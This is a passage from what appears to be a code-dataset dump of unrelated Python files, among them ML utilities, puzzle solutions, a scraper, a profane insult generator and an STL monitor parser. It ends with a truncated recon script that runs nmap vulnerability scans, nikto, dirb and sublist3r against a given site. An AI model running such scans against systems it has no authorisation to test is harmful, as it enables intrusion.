0\r\n for item, answer_list in enumerate(val_data.answers):\r\n my_answer = answers[item]\r\n count = answer_list.count(my_answer)\r\n accuracy = min(1, count/3)\r\n total_acc += accuracy\r\n\r\n print('VQA accuracy of all answers(https://visualqa.org/evaluation.html) on validataion set is:', total_acc/len(answers))\r\n\r\n\r\nif __name__ == '__main__':\r\n evaluate_hw3()","sub_path":"evaluate_hw3.py","file_name":"evaluate_hw3.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142786238","text":"import sys\n\nimport numpy\n\nCONSTANTS = {\n # The value of absolute tolerance for testing numerically tolerant\n # equality.\n 'RTOL': sys.float_info.epsilon,\n # The value of relative tolerance for testing numerically tolerant\n # equality.\n 'ATOL': sys.float_info.epsilon,\n}\n\n# --------------------------------------------------------------------\n# masked\n# --------------------------------------------------------------------\n'''A constant that allows data values to be masked by direct\nassignment. This is consistent with the behaviour of numpy masked\narrays.\n\nFor example, masking every element of a field constructs data array\ncould be done as follows:\n\n>>> f[...] = cfdm.masked\n\n'''\nmasked = numpy.ma.masked\n","sub_path":"cfdm/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"8872700","text":"import nltk\nfrom nltk.book import text1\nfrom nltk import sent_tokenize\nfrom nltk import word_tokenize\n\n\n# Open and read the text\ndef read_text(file):\n file = open(file, encoding='utf_8_sig')\n raw = file.read()\n print(type(raw))\n print(len(raw))\n print(raw[:100])\n print()\n\n\n# Word segmentation using word_tokenize()\ndef tokenize_word(file):\n file = open(file, encoding='utf_8_sig')\n raw = file.read()\n tokens = word_tokenize(raw)\n print(type(tokens))\n print(len(tokens))\n print(tokens[:10])\n print()\n\n\n# Sentence segmentation using sent_tokenize()\ndef tokenize_sent(file):\n file = open(file, encoding='utf_8_sig')\n raw = file.read()\n sent_tokens = sent_tokenize(raw)\n print(type(sent_tokens))\n print(len(sent_tokens))\n print(sent_tokens[:10])\n print()\n\n\n# Convert to a nltk Text (text = nltk.Text(tokens))\ndef convert_to_nltk(file):\n file = open(file, encoding='utf_8_sig')\n raw = file.read()\n tokens = word_tokenize(raw)\n text = nltk.Text(tokens)\n print(text)\n print()\n\n\n# Use nltk.FreqDist() to print the most common words in book and “Moby Dick”(text1)\ndef freq_dist(file):\n file = open(file, encoding='utf_8_sig')\n raw = file.read()\n tokens = word_tokenize(raw)\n\n freq_words1 = nltk.FreqDist(tokens)\n print(freq_words1)\n print(freq_words1.most_common(50))\n\n freq_words2 = nltk.FreqDist(text1)\n print(freq_words2)\n print(freq_words2.most_common(50))\n\n\n# Call the functions\nread_text('158-0.txt')\ntokenize_word('158-0.txt')\ntokenize_sent('158-0.txt')\nconvert_to_nltk('158-0.txt')\nfreq_dist('158-0.txt')\n","sub_path":"homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"420637030","text":"import pandas as pd\n\nfrom typing import List\n\nfrom constants import location_constants\nfrom models.loader_tracking.location import Location, LocationZone\nfrom utils import converters\n\n\nclass LocationManager:\n\n def __init__(self, locations: List[Location]):\n self.locations = locations\n\n def update_locations_list(self,\n zones_df: pd.DataFrame,\n shape_polygon_df: pd.DataFrame\n ):\n \"\"\"\n Updates the zones and the shape of the location\n based on zones and shape polygon data frames\n Note: the updates are performed in-place for\n the sake of memory optimization.\n :param locations:\n :param zones_df:\n :param shape_polygon_df:\n \"\"\"\n\n # Iterate and update location and zone shapes\n for location in self.locations:\n loc_shape_df = shape_polygon_df[shape_polygon_df[location_constants.location_shape_id] == location.id]\n loc_shape_polygon = converters.shape_df_to_polygon(loc_shape_df)\n location.polygon = loc_shape_polygon\n\n # Extract information about zones for the corresponding location\n loc_zones_df = zones_df[zones_df[location_constants.location_id] == location.id]\n location_zones = []\n\n for z_index, z_row in loc_zones_df.iterrows():\n z_id = z_row[location_constants.zone_id]\n z_name = z_row[location_constants.zone_name]\n z_shape_id = z_row[location_constants.zone_shape_id]\n z_timestamp = z_row[location_constants.zone_timestamp]\n\n # Extract shape for each zone\n z_shape_df = shape_polygon_df[shape_polygon_df[location_constants.zone_shape_id] == z_shape_id]\n z_shape_polygon = converters.shape_df_to_polygon(z_shape_df)\n\n zone = LocationZone(z_id, z_name, z_shape_polygon, z_timestamp)\n location_zones.append(zone)\n\n location.zones = location_zones\n\n","sub_path":"managers/location_manager.py","file_name":"location_manager.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"453769076","text":"import numpy as np\nfrom numpy import *\nfrom os import listdir #列出给定目录的文件名\nimport operator\n\n\n# 预处理图片\n# 将32x32的二进制图形矩阵转换为1x1024的向量\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr=open(filename)\n for i in range(32): #读出文件的前32行\n lineStr=fr.readline()\n for j in range(32):\n returnVect[0,32*i+j]=int(lineStr[j]) #读出每行的前32个字符值\n return returnVect\n\n#knn算法实现\ndef classify0(inX,dataSet,labels,k):\n dataSetSize=dataSet.shape[0]\n diffMat=tile(inX,(dataSetSize,1))-dataSet #求欧式距离公式 把用于分类的输入向量和输入的训练样本集求方差,先进行了数据变换\n sqDiffMat=diffMat**2\n sqDistances=sqDiffMat.sum(axis=1) #没有axis参数表示全部相加,axis=0表示按列相加,axis=1表示按照行的方向相加\n distances=sqDistances**0.5\n sortedDistTndicies = distances.argsort()\n classCount={}\n for i in range(k):\n voteIlabel=labels[sortedDistTndicies[i]]\n classCount[voteIlabel]=classCount.get(voteIlabel,0)+1\n sortedClassCount=sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n return sortedClassCount[0][0]\n\n\n\n\n\n\n#用KNN测试\ndef handwritingClassTest():\n hwLabels=[]\n trainingFileList=listdir('digits/trainingDigits')\n m=len(trainingFileList)\n trainingMat=zeros((m,1024))\n for i in range(m): #从文件名解析分类数字\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr=int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i,:]=img2vector('digits/trainingDigits/%s'%fileNameStr) #获取每张图片所有的二进制字符\n testFileList=listdir('digits/testDigits')\n errorCount=0.0\n mTest=len(testFileList)\n for i in range(mTest):\n fileNameStr=testFileList[i]\n fileStr=fileNameStr.split('.')[0]\n classNumStr=int(fileStr.split('_')[0])\n vectorUnderTest=img2vector('digits/testDigits/%s'%fileNameStr)\n classifierResult=classify0(vectorUnderTest,trainingMat,hwLabels,3)\n\n print('\\nthe total number of errors is: %d'%errorCount)\n print('\\nthe total error rate is: %f'%(errorCount/float(mTest)))\n\nhandwritingClassTest()","sub_path":"ml-in-action-v3/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551045210","text":"#!/usr/bin/env python3\nimport json\nfrom urllib.request import urlopen\n\nurlBlockHeight = urlopen('https://api.blockcypher.com/v1/btc/main').read()\nresultBlockHeight = json.loads(urlBlockHeight)\nblockheight = int(resultBlockHeight['height'])\n\nurlPrice = urlopen('https://www.bitstamp.net/api/ticker/').read()\nresultUrlPrice = json.loads(urlPrice)\ndollarPerBtc = float(resultUrlPrice['ask'])\n\nblockHalving = 210000\nfirstHalving = 210000\nsecondHalving = 420000\nthirdHalving = 630000\nfourthHalving = 840000\n\nhardCap = 21000000\n\ntotalCoins = 0;\n\nif blockheight > firstHalving:\n\ttotalCoins = blockHalving * 50\n\nif blockheight > secondHalving:\n\ttotalCoins = totalCoins + blockHalving * 25\n\nif blockheight > thirdHalving:\n\ttotalCoins = totalCoins + blockHalving * 12.5\n\nelif blockheight < thirdHalving:\n\ttemp = blockheight - secondHalving\n\ttotalCoins = totalCoins + (temp * 12.5)\n\nif blockheight > fourthHalving:\n\ttotalCoins = totalCoins + blockHalving * 6.25\n\nelif blockheight < fourthHalving and blockheight > thirdHalving:\n\ttemp = blockheight - thirdHalving\n\ttotalCoins = totalCoins + (temp * 6.25)\n\npercentageMined = totalCoins / hardCap * 100\n\nprint (\"Bitcoins in circulation :\",f\"{int(totalCoins):,d}\",\", {0:.2f}%\".format(round(percentageMined,2)))\nprint (\"Bitcoins left to mine :\",f\"{int(hardCap - totalCoins):,d}\")\nprint (\"Market capitalization :\",f\"{int(totalCoins * dollarPerBtc):,d}$\")\n","sub_path":"pythonscripts/mintedcoins.py","file_name":"mintedcoins.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129786986","text":"import bs4\nimport requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\n\nj = 0\ntplt = \"{0:{1}^10}\"\nurl='https://movie.douban.com/' # 需要爬数据的网址\npage=requests.Session().get(url) # 维持一个回话\n#print(type(page))\ntree=html.fromstring(page.text) \n\n# 在解析xml格式时,将字符串转换为element对象,解析树的根节点\nresult=tree.xpath('//td[@class=\"title\"]//a/text()') #获取需要的数据\n\nprint(tplt.format(\"Movie_Name Top 10 of Week:\",chr(12288)))\nfor i in result:\n\tif j<10:\n\t\tprint(tplt.format(result[j],chr(12288)))\n\tj += 1\n\t#print(result)\n","sub_path":"python语言学习/网络爬虫/python爬虫之xpath的基本使用/电影网排行榜爬取.py","file_name":"电影网排行榜爬取.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"612611748","text":"#\r\n# [14] Longest Common Prefix\r\n#\r\n# https://leetcode.com/problems/longest-common-prefix/description/\r\n#\r\n# algorithms\r\n# Easy (31.73%)\r\n# Total Accepted: 290.6K\r\n# Total Submissions: 916K\r\n# Testcase Example: '[\"flower\",\"flow\",\"flight\"]'\r\n#\r\n# Write a function to find the longest common prefix string amongst an array of\r\n# strings.\r\n# \r\n# If there is no common prefix, return an empty string \"\".\r\n# \r\n# Example 1:\r\n# \r\n# \r\n# Input: [\"flower\",\"flow\",\"flight\"]\r\n# Output: \"fl\"\r\n# \r\n# \r\n# Example 2:\r\n# \r\n# \r\n# Input: [\"dog\",\"racecar\",\"car\"]\r\n# Output: \"\"\r\n# Explanation: There is no common prefix among the input strings.\r\n# \r\n# \r\n# Note:\r\n# \r\n# All given inputs are in lowercase letters a-z.\r\n# \r\n#\r\nclass Solution:\r\n def longestCommonPrefix(self, strs):\r\n \"\"\"\r\n :type strs: List[strf\r\n :rtype: str\r\n \"\"\"\r\n i = 0\r\n flag = 1\r\n t = 0\r\n\r\n if len(strs) == 0: \r\n return \"\" \r\n\r\n for s in strs:\r\n if len(s) == 0:\r\n return \"\"\r\n \r\n if len(strs) == 1:\r\n return strs[0]\r\n\r\n while i < len(strs[0]) + 1 and flag: \r\n for s in strs[1:]:\r\n if strs[0][:i+1] != s[:i+1]:\r\n flag *= 0 \r\n i += 1\r\n \r\n if i >= 1: \r\n return strs[0][:i-1]\r\n elif i == 0:\r\n return strs[0][0]\r\n else:\r\n return \"\"\r\n\r\nif __name__ == '__main__':\r\n print(Solution().longestCommonPrefix([\"cc\",\"\"]))\r\n","sub_path":"leetcode/14.longest-common-prefix.python3.py","file_name":"14.longest-common-prefix.python3.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"231465062","text":"import numpy as np\n\ndef kernel_matrix_from_file(path, max_len=-1):\n \"\"\"\n Builds the kernel matrix B from a file.\n File is assumed to store the vector b[i] in rows\n return B constructed as:\n 0, i< j\n B_{i,j} =\n b_{i-j}, i>=j\n \"\"\"\n kernelvec = np.loadtxt(path)[:max_len]\n kernel = np.zeros((len(kernelvec), len(kernelvec)))\n for i in range(len(kernelvec)):\n for j in range(len(kernelvec)):\n kernel[i, j] = kernelvec[i-j]\n del(kernelvec)\n return kernel\n\ndef kernel_from_list(kernel_path_list, max_len=-1):\n \"\"\"\n Builds kernel matrix for a list of kernel corrections\n\n Each kernel correction is loaded by kernel_matrix_from_file, format information can be found in the help of that function\n \"\"\"\n matrices = []\n for p in kernel_path_list:\n matrices.append(kernel_matrix_from_file(p, max_len))\n kernel = matrices[0]\n\n for m in matrices[1:]:\n kernel = np.dot(m, kernel)\n return kernel\n","sub_path":"pycqed/measurement/waveform_control/kernel_distortion_module.py","file_name":"kernel_distortion_module.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"19525029","text":"#A program to combine a swear word with an animal.\n#Based on the Thom Bee theory of the perfect insult.\nimport random\nimport time\nvar = 1\n\nfoul_lan = [\n\"piss\", \"shit\", \"fuck\", \"cunt\", \"cock\", \"clunge\", \"shite\", \"jizz\", \"cum\", \"muff\"\n\"panty\", \"minge\", \"wank\", \"trump\", \"bugger\", \"twat\", \"flap\", \"bum\", \"pussy\", \"sperm\",\n\"fart\", \"poo\", \"arse\"\n]\n\nanimals = [\n\"weasel\", \"snail\", \"kitten\", \"fox\", \"pup\", \"slug\", \"monkey\", \"whale\", \"pigeon\",\n\"fly\", \"falcoln\", \"hawk\", \"budgie\", \"ant\", \"womble\", \"cat\", \"dog\"\n]\n\nwhile var == 1:\n print (\"\"\"\n Let's receive a new insult to call your friends and nan.\n\n \"\"\"\n )\n time.sleep(2)\n swear = random.choice(foul_lan)\n suffix = random.choice(animals)\n print (swear + \" \" + suffix)\n time.sleep(2)\n go_again = input(\n \"\"\"\n\n Would you like to go again? Y/N...\n \"\"\"\n )\n go_again = go_again.lower\n if go_again()[0] is \"n\":\n var = 2\n print (\"Fuckity-bye\")\n time.sleep(3)\n","sub_path":"insult_algorithm.py","file_name":"insult_algorithm.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206188319","text":"# Problem 112\n# ===========\n\n\n# Working from left-to-right if no digit is exceeded by the digit to its\n# left it is called an increasing number; for example, 134468.\n\n# Similarly if no digit is exceeded by the digit to its right it is called a\n# decreasing number; for example, 66420.\n\n# We shall call a positive integer that is neither increasing nor decreasing\n# a \"bouncy\" number; for example, 155349.\n\n# Clearly there cannot be any bouncy numbers below one-hundred, but just\n# over half of the numbers below one-thousand (525) are bouncy. In fact, the\n# least number for which the proportion of bouncy numbers first reaches 50%\n# is 538.\n\n# Surprisingly, bouncy numbers become more and more common and by the time\n# we reach 21780 the proportion of bouncy numbers is equal to 90%.\n\n# Find the least number for which the proportion of bouncy numbers is\n# exactly 99%.\n\n\n# Answer: 1587000 calculated in 2.86549806595 seconds\n\nfrom euler import runtime\nfrom itertools import count\n\n\ndef bouncy(n):\n d = []\n while n:\n d.append(n % 10)\n n /= 10\n for x in xrange(len(d)-1):\n if not d[x] <= d[x+1]:\n break\n else:\n return False\n for x in xrange(len(d)-1):\n if not d[x] >= d[x+1]:\n break\n else:\n return False\n return True\n\n\ndef problem_112(c=0):\n for n in count(1):\n if bouncy(n):\n c += 1\n if float(c)/n == 0.99:\n return n\n\nruntime(problem_112)\n","sub_path":"solutions/112.py","file_name":"112.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635904655","text":"# monkeys (and number theory)\n\nfrom typing import Callable\n\n\nfilename = \"input.txt\"\n# filename = \"sample.txt\"\n\nwith open(filename, \"r\") as f:\n notes = [l.strip() for l in f.readlines()]\n\n\nclass Monkey:\n MOD = 1 << 30\n def __init__(self, index: int, notes: list[str]) -> None:\n self.items: list[int] = [int(n) for n in notes[index + 1].split(': ')[1].split(', ')]\n \n \n operation_line = notes[index + 2].split(' ')[-2:]\n if operation_line[0] == \"*\":\n if operation_line[1] == \"old\":\n operation = lambda n: n * n\n else:\n operation = lambda n: n * int(operation_line[1])\n else:\n operation = lambda n: n + int(operation_line[1])\n self.operation: Callable[[int], int] = operation\n\n self.test_cond_value = int(notes[index + 3].split(' ')[-1])\n test_cond = lambda n: n % self.test_cond_value == 0\n if_true = int(notes[index + 4].split(' ')[-1])\n if_false = int(notes[index + 5].split(' ')[-1])\n self.throw_to: Callable[[int], int] = lambda n: if_true if test_cond(n) else if_false\n\n self.relief: Callable[[int], int] = lambda n: n//3\n \n\n def add_item(self, item: int) -> None:\n self.items.append(item)\n\n\n def take_turn(self) -> list[list[int]]:\n throws: list[list[int]] = []\n\n for item in self.items:\n item = self.operation(item)\n item = self.relief(item)\n to = self.throw_to(item)\n throws.append([to, item])\n\n self.items.clear()\n\n return throws\n\n def get_test_cond_value(self) -> int:\n return self.test_cond_value\n\n def set_relief_func(self, l: Callable[[int], int]) -> None:\n self.relief = l\n\n\n\ndef first() -> int:\n monkeys: list[Monkey] = []\n \n for i_note in range(0, len(notes), 7):\n monkeys.append(Monkey(i_note, notes))\n \n inspections: list[int] = [0] * len(monkeys)\n\n for _ in range(20):\n for i_m, m in enumerate(monkeys):\n \n throws = m.take_turn()\n inspections[i_m] += len(throws)\n\n for to, item in throws:\n monkeys[to].add_item(item)\n\n inspections.sort()\n\n return inspections[-1] * inspections[-2]\n\n\ndef second() -> int:\n monkeys: list[Monkey] = []\n \n for i_note in range(0, len(notes), 7):\n monkeys.append(Monkey(i_note, notes))\n\n mod = 1\n for m in monkeys:\n mod *= m.get_test_cond_value()\n\n for m in monkeys:\n m.set_relief_func(lambda n: n % mod)\n \n inspections: list[int] = [0] * len(monkeys)\n\n for i in range(10000):\n\n for i_m, m in enumerate(monkeys):\n \n throws = m.take_turn()\n inspections[i_m] += len(throws)\n\n for to, item in throws:\n monkeys[to].add_item(item)\n\n inspections.sort()\n\n return inspections[-1] * inspections[-2]\n\n\nif __name__ == '__main__':\n print(first())\n print(second())\n","sub_path":"2022/day 11/m.py","file_name":"m.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351958961","text":"import mongoengine\nfrom doc_struct import Game\n\nmongoengine.connect(\"nba\")\n\n\ndef updating_game_scores():\n \"\"\"\n Query The database for games without a home team score and the date is earlier then the current ISO\n\n Atomic update of the documents score scraping the specific URL\n\n \"\"\"\n home_wins = Game.objects().filter()\n for game in home_wins:\n print(home_wins.home_team)\n\nupdating_game_scores()\n","sub_path":"updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372792720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 20:32:57 2019\n\n@author: NickovicD\n\"\"\"\n\nimport logging\nimport importlib\nimport operator\n\nfrom antlr4 import *\nfrom antlr4.InputStream import InputStream\n\nfrom rtamt.spec.abstract_specification import AbstractSpecification\n\nfrom rtamt.parser.stl.StlLexer import StlLexer\nfrom rtamt.parser.stl.StlParser import StlParser\nfrom rtamt.parser.stl.StlParserVisitor import StlParserVisitor\n\nfrom rtamt.parser.stl.error.parser_error_listener import STLParserErrorListener\nfrom rtamt.exception.stl.exception import STLParseException\nfrom rtamt.exception.stl.exception import STLOfflineException\n\nfrom rtamt.spec.stl.node_visitor import STLNodeVisitor\nfrom rtamt.spec.stl.pastifier import STLPastifier\nfrom rtamt.spec.stl.evaluator import STLEvaluator\n\n\nclass STLSpecification(AbstractSpecification,StlParserVisitor):\n \"\"\"A class used as a container for STL specifications\n\n Attributes:\n name : String\n\n vars : set(String) - set of variable names\n free_vars : set(String) - set of free variable names\n\n var_object_dict : dict(String,AbstractNode) - dictionary that maps variable names to their Node instances\n modules : dict(String,String) - dictionary that maps module paths to module names\n\n top : AbstractNode - pointer to the specification parse tree\n\n evaluator : AbstractEvaluator - pointer to the object that implements the monitoring algorithm\n \"\"\"\n def __init__(self, is_pure_python = True):\n \"\"\"Constructor for STL Specification\"\"\"\n super(STLSpecification, self).__init__(is_pure_python)\n self.name = 'STL Specification'\n self.visitor = STLNodeVisitor(self)\n\n\n # Parses the STL property\n # string can be either file path containint the STL property\n # or the textual property itself\n def parse(self):\n if self.spec is None:\n raise STLParseException ('STL specification if empty')\n\n # Parse the STL spec - ANTLR4 magic\n input_stream = InputStream(self.spec)\n lexer = StlLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = StlParser(stream)\n parser._listeners = [STLParserErrorListener()]\n ctx = parser.stlfile()\n\n # Visit the parse tree and populate spec fields\n self.visitStlfile(ctx)\n\n # Create the visitor for the actual spec nodes\n self.top = self.visitor.visitStlfile(ctx)\n\n # Translate bounded future STL to past STL\n pastifier = STLPastifier(self)\n self.top.accept(pastifier)\n past = pastifier.pastify(self.top)\n self.top = past\n\n # Initialize the evaluator\n self.evaluator = STLEvaluator(self)\n self.top.accept(self.evaluator)\n\n def update(self, *args, **kargs):\n time_index = args[0]\n signals = args[1]\n for arg in signals:\n var_name = arg[0]\n var_object = arg[1]\n self.var_object_dict[var_name] = var_object\n\n return self.evaluator.evaluate(self.top, [time_index])\n\n # This is the visitor part. We will populate\n def visitStlSpecification(self, ctx):\n self.visitChildren(ctx)\n # self.top = self.visitor.visitAssertion(ctx.assertion())\n\n def visitSpecification(self, ctx):\n self.visitChildren(ctx)\n # The specification name is updated only if it is given\n # by the user\n if not ctx.Identifier() is None:\n self.name = ctx.Identifier().getText()\n\n def visitAssertion(self, ctx):\n self.visitChildren(ctx)\n id = ctx.Identifier().getText();\n id_tokens = id.split('.')\n id_head = id_tokens[0]\n id_tokens.pop(0)\n id_tail = '.'.join(id_tokens)\n\n try:\n var = self.var_object_dict[id_head]\n if (not id_tail):\n if (not isinstance(var, (int, float))):\n raise STLParseException('Variable {} is not of type int or float'.format(id))\n else:\n try:\n value = operator.attrgetter(id_tail)(var)\n if (not isinstance(value, (int, float))):\n raise STLParseException(\n 'The field {0} of the variable {1} is not of type int or float'.format(id, id_head))\n except AttributeError as err:\n raise STLParseException(err)\n except KeyError:\n if id_tail:\n raise STLParseException('{0} refers to undeclared variable {1} of unknown type'.format(id, id_head))\n else:\n var = float()\n self.var_object_dict[id] = var\n self.add_var(id)\n logging.warning('The variable {} is not explicitely declared. It is implicitely declared as a '\n 'variable of type float'.format(id))\n\n self.out_var = id_head;\n self.out_var_field = id_tail;\n self.free_vars.discard(id_head)\n\n def visitVariableDeclaration(self, ctx):\n # fetch the variable name, type and io signature\n var_name = ctx.identifier().getText()\n var_type = ctx.domainType().getText()\n\n self.declare_var(var_name, var_type)\n self.var_io_dict[var_name] = 'output'\n\n self.visitChildren(ctx)\n\n def visitRosTopic(self, ctx):\n var_name = ctx.Identifier(0).getText()\n topic_name = ctx.Identifier(1).getText()\n self.set_var_topic(var_name, topic_name)\n\n def visitModImport(self, ctx):\n module_name = ctx.Identifier(0).getText()\n var_type = ctx.Identifier(1).getText()\n self.import_module(module_name, var_type)\n\n def create_var_from_name(self, var_name):\n var = None\n var_type = self.var_type_dict[var_name]\n if var_type.encode('utf-8') == 'float'.encode('utf-8'):\n var = float()\n elif var_type.encode('utf-8') == 'int'.encode('utf-8'):\n var = int()\n elif var_type.encode('utf-8') == 'complex'.encode('utf-8'):\n var = complex()\n else:\n try:\n var_module = self.modules[var_type]\n class_ = getattr(var_module, var_type)\n var = class_()\n except KeyError:\n raise STLParseException ('The type {} does not seem to be imported.'.format(var_type))\n return var\n\n def import_module(self, from_name, module_name):\n try:\n module = importlib.import_module(from_name)\n self.modules[module_name] = module\n except ImportError:\n raise STLParseException ('The module {} cannot be loaded'.format(from_name))\n\n def declare_var(self, var_name, var_type):\n if var_name in self.vars:\n logging.warning('Variable {} was already declared. It is now overriden with the new declaration.'.format(var_name))\n\n # Associate to variable name 'var' its type 'type'\n self.var_type_dict[var_name] = var_type\n\n # Add variable name 'var' to the set of variables\n self.add_var(var_name)\n self.free_vars.add(var_name)\n instance = self.create_var_from_name(var_name)\n self.var_object_dict[var_name] = instance\n\n # Add the default variable topic to var\n self.var_topic_dict[var_name] = 'rtamt/{}'.format(var_name)\n\n self.var_io_dict[var_name] = 'output'\n\n def set_var_topic(self, var_name, var_topic):\n if not var_name in self.vars:\n logging.warning(\n 'The variable {0} is not declared. Setting its topic name to {1} is ignored.'.format(var_name,\n var_topic))\n else:\n topic = self.var_topic_dict[var_name]\n self.var_topic_dict[var_name] = var_topic\n\n def offline(self, dataset):\n counter = 0\n prev_signal_length = 0\n signal_length = 0\n out = 0\n\n for var_name in dataset:\n signal_length = len(dataset[var_name])\n if counter > 0 and not (signal_length == prev_signal_length):\n raise STLOfflineException('Input signals have different length')\n prev_signal_length = signal_length\n counter = counter + 1\n\n for i in range(signal_length):\n signal_snapshot = []\n counter = 0\n prev_time = 0\n for var_name in dataset:\n signal = dataset[var_name]\n sample = signal[i]\n time = sample[0]\n value = sample[1]\n if counter > 0 and not (time == prev_time):\n raise STLOfflineException('The time indices do not agree')\n signal_snapshot.append((var_name, value))\n counter = counter + 1\n prev_time = time\n out = self.update(time, signal_snapshot)\n\n return out\n\n\n\n\n\n\n","sub_path":"rtamt/spec/stl/specification.py","file_name":"specification.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204483588","text":"\n\nfrom xai.brain.wordbase.nouns._birdie import _BIRDIE\n\n#calss header\nclass _BIRDIEING(_BIRDIE, ):\n\tdef __init__(self,): \n\t\t_BIRDIE.__init__(self)\n\t\tself.name = \"BIRDIEING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"birdie\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_birdieing.py","file_name":"_birdieing.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557366027","text":"import math\ndef solution(n):\n #print(\"{0:b}\".format(n))\n m=0\n cnt= 0\n ingap =False\n p = 0\n r = n % 2\n q = int(math.ceil(n / 2))\n if q == 1:\n return 0\n if r == 1:\n ingap = True\n while q >=1:\n #print(q, r)\n if ingap and r == 1:\n ingap = False\n m = max(m, cnt)\n elif ingap and r == 0:\n cnt+=1\n elif not ingap and r == 1:\n ingap = True\n cnt = 0\n elif not ingap and r == 0:\n if p == 1:\n ingap = True\n cnt = 1\n p = r\n r = q % 2\n q = int(math.ceil(q / 2))\n\n return max(m,cnt)\ndef main():\n testcases = [1,3,4,5,41,1041]\n for i in range(len(testcases)):\n tc = testcases[i]\n print(tc, solution(tc))\nif __name__ == '__main__':\n main()","sub_path":"binarygap.py","file_name":"binarygap.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"394972567","text":"from colorama import Fore, Back, Style\nfrom os import path\nfrom fake_useragent import UserAgent\nimport dns.resolver\nimport sys, subprocess, time, socket, io, re, requests\n\n# by c0d3Ninja\n\nif len(sys.argv) !=2:\n print (\"python3 automate.py Site\")\n sys.exit(1)\n\nsite = sys.argv[1]\n\n# Convert URL to site.com by stripping down \"http://www.\" and \"https://www.\"\n\nif site[0:5] == \"https\":\n dotcom = site[12:]\n dotcom = dotcom.replace(\"/\",\"\")\nelif site[0:4] == 'http':\n dotcom = site[11:]\n dotcom = dotcom.replace(\"/\", \"\")\n\nip = socket.gethostbyname(dotcom)\n\n# Check if the site is available\n\ndef sitestatus():\n try:\n print(\"Checking if the site is up...\")\n ua = UserAgent()\n header = {'User-Agent':str(ua.chrome)}\t\t\n response = requests.get(site, headers=header)\n if response.status_code == 200:\n print (Fore.GREEN + \"Site: {} is up!\".format(site))\n elif response.status_code == 400:\n print (Fore.RED + \"Bad Request\")\n elif response.status_code == 404:\n print (Fore.RED + \"Not Found\")\n elif response.status_code == 403:\n print (Fore.RED + \"Forbidden\")\n elif response.status_code == 405:\n print (Fore.RED + \"Method not allowed\")\n elif response.status_code == 404:\n print (Fore.RED + \"Not Found\")\n elif response.status_code == 423:\n print (Fore.RED + \"LOCKED\")\n elif response.status_code == 429:\n print (Fore.RED + \"Too many requests\")\n elif response.status_code == 499:\n print (Fore.RED + \"Client closed request\")\n elif response.status_code == 500:\n print (Fore.RED + \"Server error\")\n elif response.status_code == 501:\n print (Fore.RED + \"Not implemented\")\n elif response.status_code == 502:\n print (Fore.RED + \"Bad Gateway\")\n elif response.status_code == 503:\n print (Fore.RED + \"Service Unavailable\")\n elif response.status_code == 511:\n print (Fore.RED + \"Network Authentication Required\")\n elif response.status_code == 599:\n print (Fore.RED + \"Network Connect Timeout Error\")\n except requests.exceptions.MissingSchema:\n print (Fore.GREEN + \"Please use: http://site.com\")\t\n except requests.exceptions.ConnectionError:\n print (Fore.RED + \"name or service not known\")\n\n# Tools \n\ndef nmapSCAN():\n print (\"================ RUNNING PORT SCAN ON PORT 80,8080,443 ================\" + \"\\n\")\n nmap = \"nmap -sV -T5 -p80,8080,443 \"\n commands(nmap + ip + \"\\n\")\n\ndef nmapvulnSCAN():\n print (\"================ RUNNING a vulnerability scan with Nmap ================\" + \"\\n\")\n nmap = \"nmap --script vuln -p80,8080,443 -T5 \"\n commands(nmap + ip + \"\\n\")\n\ndef sublist3rSCAN():\n sublist3r = \"cd Sublist3r; python3 sublist3r.py -d\" \n commands(sublist3r + \" \" + dotcom + \"\\n\")\n\ndef niktoSCAN():\n nikto = \"nikto -h \"\n commands(nikto + site + \"\\n\")\n\ndef dirbSCAN():\n dirb 